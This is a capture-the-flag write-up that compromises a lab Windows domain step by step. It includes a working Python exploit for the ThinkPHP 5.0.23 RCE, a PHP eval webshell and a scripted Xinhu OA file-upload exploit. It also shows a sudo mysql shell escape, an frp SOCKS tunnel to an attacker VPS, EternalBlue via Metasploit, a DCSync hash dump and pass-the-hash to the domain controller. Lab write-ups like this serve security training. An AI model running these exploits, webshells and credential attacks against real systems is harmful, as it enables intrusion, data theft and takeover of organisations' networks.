Information gathering
Test the external web host for the ThinkPHP 5.0.23 RCE
Write a webshell
Reverse shell
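The probe-and-execute steps above in code, as an added example that is not part of the original post. It reproduces the public vulhub PoC request for the 5.0.23 method-override bug (the same reference fscan prints later): `_method=__construct` re-runs `Request::__construct()` with the POSTed fields, which overwrites the `filter` property, and the value of `server[REQUEST_METHOD]` is then pushed through that filter, so the framework ends up calling `call_user_func(filter, value)`. Assumptions: standard library only, the lab host 172.22.1.15 as target, and a `post` hook of my own so the logic can be exercised offline; dropping a webshell is just one more command through `run_command`.

```python
from urllib import parse, request

# Added example (not from the original post). Probe the ThinkPHP 5.0.23
# method-override RCE and run commands through it. Reference PoC:
# https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

PROBE_PATH = "/index.php?s=captcha"


def rce_payload(filter_func: str, arg: str) -> dict:
    """Build the POST body that turns Request::method() into call_user_func().

    _method=__construct     -> Request::__construct() is re-run with POST fields
    filter[]=<func>         -> overwrites the request's `filter` property
    method=get              -> routes into the server() / filterValue() path
    server[REQUEST_METHOD]  -> the value that is fed to <func>
    """
    return {
        "_method": "__construct",
        "filter[]": filter_func,
        "method": "get",
        "server[REQUEST_METHOD]": arg,
    }


def http_post(url: str, data: dict, timeout: float = 8.0) -> str:
    """Minimal stdlib POST returning the response body as text."""
    body = parse.urlencode(data).encode()
    req = request.Request(url, data=body, method="POST")
    with request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def is_vulnerable(base_url: str, post=http_post, timeout: float = 8.0) -> bool:
    """Fire phpinfo() through the filter; a vulnerable target returns its page.

    `post` is an injectable hook (assumption for offline testing), called as
    post(url, data, timeout).
    """
    text = post(base_url.rstrip("/") + PROBE_PATH, rce_payload("phpinfo", "1"), timeout)
    return "PHP Version" in text


def run_command(base_url: str, cmd: str, post=http_post, timeout: float = 8.0) -> str:
    """Run `cmd` with system() and return the raw response body.

    Writing a webshell is one such command, e.g.
    run_command(url, "echo '<?php @eval($_POST[1]);?>' > shell.php")
    """
    return post(base_url.rstrip("/") + PROBE_PATH, rce_payload("system", cmd), timeout)


if __name__ == "__main__":
    target = "http://172.22.1.15"  # lab web host from the post
    if is_vulnerable(target):
        print("[+] ThinkPHP 5.0.23 method RCE confirmed on", target)
        print(run_command(target, "id"))
    else:
        print("[-] not vulnerable or not reachable")
```

Use `phpinfo` for the check rather than `system`: it is a reliable, side-effect-free marker, and it tells you the PHP version and `disable_functions` before you pick a command primitive.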
Get the first half of the flag

The web user can run `mysql` through sudo (no password prompt here), and the mysql client's `\!` command hands a line to the system shell, so reading root's files takes one `-e`:
```
www-data@ubuntu-web01:/$ sudo mysql -e '\! cat /root/flag/f*'
[ASCII-art banner omitted]
Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.
flag01: flag{60b53231-
www-data@ubuntu-web01:/$
```
Scan the internal network

Upload fscan to /tmp, check the interface, and sweep the local /24:
```
www-data@ubuntu-web01:/tmp$ chmod 777 fscan
www-data@ubuntu-web01:/tmp$ ls -al
total 8396
drwxrwxrwt  2 root     root        4096 Apr 17 13:53 .
drwxr-xr-x 18 root     root        4096 Apr 17 13:39 ..
-rwxrwxrwx  1 www-data www-data 8585724 Apr 17 13:53 fscan
www-data@ubuntu-web01:/tmp$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:0f:3f:f4 brd ff:ff:ff:ff:ff:ff
    inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 315359108sec preferred_lft 315359108sec
    inet6 fe80::216:3eff:fe0f:3ff4/64 scope link
       valid_lft forever preferred_lft forever
www-data@ubuntu-web01:/tmp$ ./fscan -h 172.22.1.15/24
[fscan banner omitted]
Fscan Version: 2.0.0
[2025-04-17 13:54:36] [INFO] Brute-force threads: 1
[2025-04-17 13:54:36] [INFO] Starting information scan
[2025-04-17 13:54:36] [INFO] CIDR range: 172.22.1.0-172.22.1.255
[2025-04-17 13:54:37] [INFO] Generated IP range: 172.22.1.0.%!d(string=172.22.1.255) - %!s(MISSING).%!d(MISSING)
[2025-04-17 13:54:37] [INFO] Parsed CIDR 172.22.1.15/24 -> IP range 172.22.1.0-172.22.1.255
[2025-04-17 13:54:37] [INFO] Final effective host count: 256
[2025-04-17 13:54:37] [INFO] Starting host scan
[2025-04-17 13:54:37] [INFO] Trying listener-less ICMP probe...
[2025-04-17 13:54:37] [INFO] Current user lacks privileges to send ICMP packets
[2025-04-17 13:54:37] [INFO] Falling back to PING probe...
[2025-04-17 13:54:37] [SUCCESS] Target 172.22.1.2 alive (ICMP)
[2025-04-17 13:54:37] [SUCCESS] Target 172.22.1.15 alive (ICMP)
[2025-04-17 13:54:37] [SUCCESS] Target 172.22.1.21 alive (ICMP)
[2025-04-17 13:54:37] [SUCCESS] Target 172.22.1.18 alive (ICMP)
[2025-04-17 13:54:43] [INFO] Alive hosts: 4
[2025-04-17 13:54:43] [INFO] Effective ports: 233
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.2:139
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.2:88
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.18:80
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.15:80
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.15:22
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.18:135
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.21:135
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.2:135
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.21:445
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.18:445
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.2:445
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.2:389
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.21:139
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.18:139
[2025-04-17 13:54:43] [SUCCESS] Port open 172.22.1.18:3306
[2025-04-17 13:54:43] [SUCCESS] Service identified 172.22.1.15:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.5 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-17 13:54:48] [SUCCESS] Service identified 172.22.1.18:3306 => [mysql] product:MySQL info:unauthorized Banner:[D.j Host '172.22.1.15' is not allowed to connect to this MySQL server]
[2025-04-17 13:54:48] [SUCCESS] Service identified 172.22.1.2:139 => Banner:[.]
[2025-04-17 13:54:48] [SUCCESS] Service identified 172.22.1.2:88 =>
[2025-04-17 13:54:48] [SUCCESS] Service identified 172.22.1.21:445 =>
[2025-04-17 13:54:49] [SUCCESS] Service identified 172.22.1.18:445 =>
[2025-04-17 13:54:49] [SUCCESS] Service identified 172.22.1.2:445 =>
[2025-04-17 13:54:49] [SUCCESS] Service identified 172.22.1.2:389 => [ldap] product:Microsoft Windows Active Directory LDAP os:Windows info:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-17 13:54:49] [SUCCESS] Service identified 172.22.1.18:80 => [http]
[2025-04-17 13:54:49] [SUCCESS] Service identified 172.22.1.21:139 => Banner:[.]
[2025-04-17 13:54:49] [SUCCESS] Service identified 172.22.1.15:80 => [http]
[2025-04-17 13:54:49] [SUCCESS] Service identified 172.22.1.18:139 => Banner:[.]
[2025-04-17 13:55:48] [SUCCESS] Service identified 172.22.1.18:135 =>
[2025-04-17 13:55:48] [SUCCESS] Service identified 172.22.1.21:135 =>
[2025-04-17 13:55:48] [SUCCESS] Service identified 172.22.1.2:135 =>
[2025-04-17 13:55:49] [INFO] Alive ports: 15
[2025-04-17 13:55:49] [INFO] Starting vulnerability scan
[2025-04-17 13:55:49] [INFO] Loaded plugins: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-17 13:55:49] [SUCCESS] NetInfo result  target: 172.22.1.2  hostname: DC01  interfaces: IPv4: 172.22.1.2
[2025-04-17 13:55:49] [SUCCESS] NetInfo result  target: 172.22.1.21  hostname: XIAORANG-WIN7  interfaces: IPv4: 172.22.1.21
[2025-04-17 13:55:49] [INFO] OS info 172.22.1.2 [Windows Server 2016 Datacenter 14393]
[2025-04-17 13:55:49] [SUCCESS] Web title http://172.22.1.15 status:200 length:5578 title:Bootstrap Material Admin
[2025-04-17 13:55:49] [SUCCESS] NetBios 172.22.1.2 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-17 13:55:49] [SUCCESS] NetInfo result  target: 172.22.1.18  hostname: XIAORANG-OA01  interfaces: IPv4: 172.22.1.18
[2025-04-17 13:55:49] [SUCCESS] Vulnerability found 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-17 13:55:49] [SUCCESS] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-17 13:55:49] [SUCCESS] Web title http://172.22.1.18 status:302 length:0 title:(none) redirect: http://172.22.1.18?m=login
[2025-04-17 13:55:49] [SUCCESS] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[2025-04-17 13:55:50] [SUCCESS] Target: http://172.22.1.15:80 vuln type: poc-yaml-thinkphp5023-method-rce vuln name: poc1 details: links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-04-17 13:55:50] [SUCCESS] Web title http://172.22.1.18?m=login status:200 length:4012 title:信呼协同办公系统
```

Note that eth0 sits on a /16; only the 172.22.1.0/24 slice was scanned here. The "Generated IP range" line with `%!d(...)` is fscan's own format-string bug and can be ignored.
Summary of what the scan found:

- 172.22.1.2  DC01.xiaorang.lab, Windows Server 2016 (domain controller)
- 172.22.1.21 XIAORANG-WIN7, Windows Server 2008 R2, vulnerable to MS17-010
- 172.22.1.18 XIAORANG-OA01, Windows Server 2012 R2, running Xinhu OA (信呼协同办公系统)
172.22.1.18 - Xinhu OA nday

The OA host is only reachable from inside 172.22.0.0/16, so first build a SOCKS5 pivot with frp: frps runs on an attacker-controlled VPS, frpc on the compromised web server. frps.ini:
```ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = 123456
```

The dashboard is bound to every interface with a trivial password; anyone who can reach port 7500 on the VPS can see your tunnels. Bind it to 127.0.0.1 or set a real `dashboard_pwd` on anything other than a throwaway lab box.
frpc.ini (on the compromised web server):
```ini
[common]
server_addr = xxxxxxxxx
server_port = 7000
tls_enable = true

[plugin socks]
type = tcp
remote_port = 8886
plugin = socks5
use_encryption = true
use_compression = true
```

Once frpc connects, the VPS exposes a SOCKS5 proxy on port 8886 that exits from the web server's network; that is the port proxychains on Kali points at later.
Through the proxy, http://172.22.1.18 redirects to the OA login page.

Log in with admin/admin123 (the default credentials).
```python
import requests

session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

# Step 1: log in. Credentials are base64 (YWRtaW4= is "admin", YWRtaW4xMjM= is "admin123").
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
r = session.post(url1, data=data1)

# Step 2: upload the PHP file. The server stores it under upload/ with a .uptemp suffix
# and returns the temporary path plus a file id.
r = session.post(url2, files={'file': open('1.php', 'rb')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
file_id = r.json()['id']
print(file_id)
print(filepath)

# Step 3: the qcloudCos|runt task processes the uploaded file by id and strips the
# .uptemp suffix, leaving a .php file under the web root.
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)

# Step 4: hit the webshell.
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
```
Running it prints the file id and the webshell path:
```
D:\python3.7\python.exe C:\Users\31702\Desktop\debug\1.py
9
/upload/2025-04/17_14190460.php
<br />
<b>Notice</b>: Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-04\17_14190460.php</b> on line <b>1</b><br />

Process finished with exit code 0
```
Get flag02

The PHP Notice is raised from inside the uploaded file, so it is executing; from the webshell, read the second flag:
```
[ASCII-art banner omitted]
flag02: 2ce3-4813-87d4-
Awesome! ! ! You found the second flag, now you can attack the domain controller.
```
172.22.1.21 - EternalBlue

Next target. First point proxychains on Kali at the frp SOCKS5 proxy (port 8886 above), then run EternalBlue through it:
```
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
show options
set rhosts 172.22.1.21
run
```

The payload is `bind_tcp` rather than the default reverse shell on purpose: the session is established through the SOCKS tunnel, so Kali can connect in to the target, but the target has no route back to Kali for a reverse connection.
172.22.1.2 - Lateral movement

With a SYSTEM-level meterpreter on XIAORANG-WIN7, load kiwi and pull every account's NTLM hash from the DC with DCSync:

```
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
```

DCSync is a replication request over DRSUAPI and only succeeds if the calling identity holds the DS-Replication-Get-Changes rights on the domain. Under SYSTEM the request is authenticated as the machine account XIAORANG-WIN7$, so the fact that it works means that account has been granted those rights in this lab; on a real network you would normally need domain admin (or an equivalently delegated) credentials first.
```
meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.17
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
Success.
meterpreter > sysinfo
Computer        : XIAORANG-WIN7
OS              : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : XIAORANG
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	fb812eea13a18b7fcdb8e6d67ddc205b	514
1106	Marcus	e07510a4284b3c97c8e7dee970918c5c	512
1107	Charles	f6a9881cd5ae709abb4ac9ab87f24617	512
1000	DC01$	f0dee3e75230ecc2a06076e70de6dcf8	532480
500	Administrator	10cf89a850fb1cdbe6bb432b859164c8	512
1104	XIAORANG-OA01$	1b4237e449ac446607663c4f2793019a	4096
1108	XIAORANG-WIN7$	59d3f4db5fc252d89c3494b4154a2133	4096
meterpreter >
```

(Repeated `[proxychains] DLL init` lines trimmed.) The columns are RID, account name, NTLM hash and userAccountControl.
Pass-the-hash

Pass the Administrator NTLM hash from the dump to the DC with crackmapexec and read the last flag:
```
proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
```
```
┌──(root㉿kali)-[~]
└─# proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:445 ... OK
[proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:135 ... OK
SMB  172.22.1.2  445  DC01  [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:445 ... OK
SMB  172.22.1.2  445  DC01  [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:135 ... OK
[proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:49668 ... OK
SMB  172.22.1.2  445  DC01  [+] Executed command
SMB  172.22.1.2  445  DC01  [ASCII-art banner omitted]
SMB  172.22.1.2  445  DC01  flag03: e8f88d0d43d6}
SMB  172.22.1.2  445  DC01  Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.
```
Full flag, assembled from the three parts:

```
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
```